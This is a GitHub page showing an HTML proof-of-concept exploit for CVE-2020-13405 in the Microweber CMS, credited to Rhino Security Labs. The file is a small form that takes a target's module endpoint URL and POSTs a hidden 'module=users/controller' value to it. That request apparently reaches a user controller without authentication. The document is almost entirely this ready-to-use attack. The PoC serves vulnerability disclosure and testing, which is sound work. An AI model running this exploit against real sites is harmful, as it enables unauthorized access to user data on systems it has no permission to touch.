-
Notifications
You must be signed in to change notification settings - Fork 239
/
Copy pathCVE-2020-13405.html
34 lines (30 loc) · 1.07 KB
/
CVE-2020-13405.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<html>
<head>
<meta name="referrer" content="origin">
<script>
function updateForm()
{
var modulesUrl = document.getElementById("module_url").value;
if(modulesUrl != "")
{
document.getElementById("exploit_form").action = modulesUrl;
return true;
}
else
{
alert("Please enter a URL into the MicroWeber Module Endpoint URL field.")
return false;
}
}
</script>
</head>
<h1 style="color:red;">CVE-2020-13405 PoC</h1>
<h3 style="color:red;">Rhino Security Labs</h3>
</br>
<label for="fname">MicroWeber Module Endpoint URL</label>
<input type="text" id="module_url" name="module_url" placeholder="http://localhost/module">
<form action="/placeholder" method="post" id="exploit_form" name="exploit_form">
<input type="submit" value="Attempt Exploit" onclick="return updateForm()">
<input type="hidden" id="module" name="module" value="users/controller">
</form>
</html>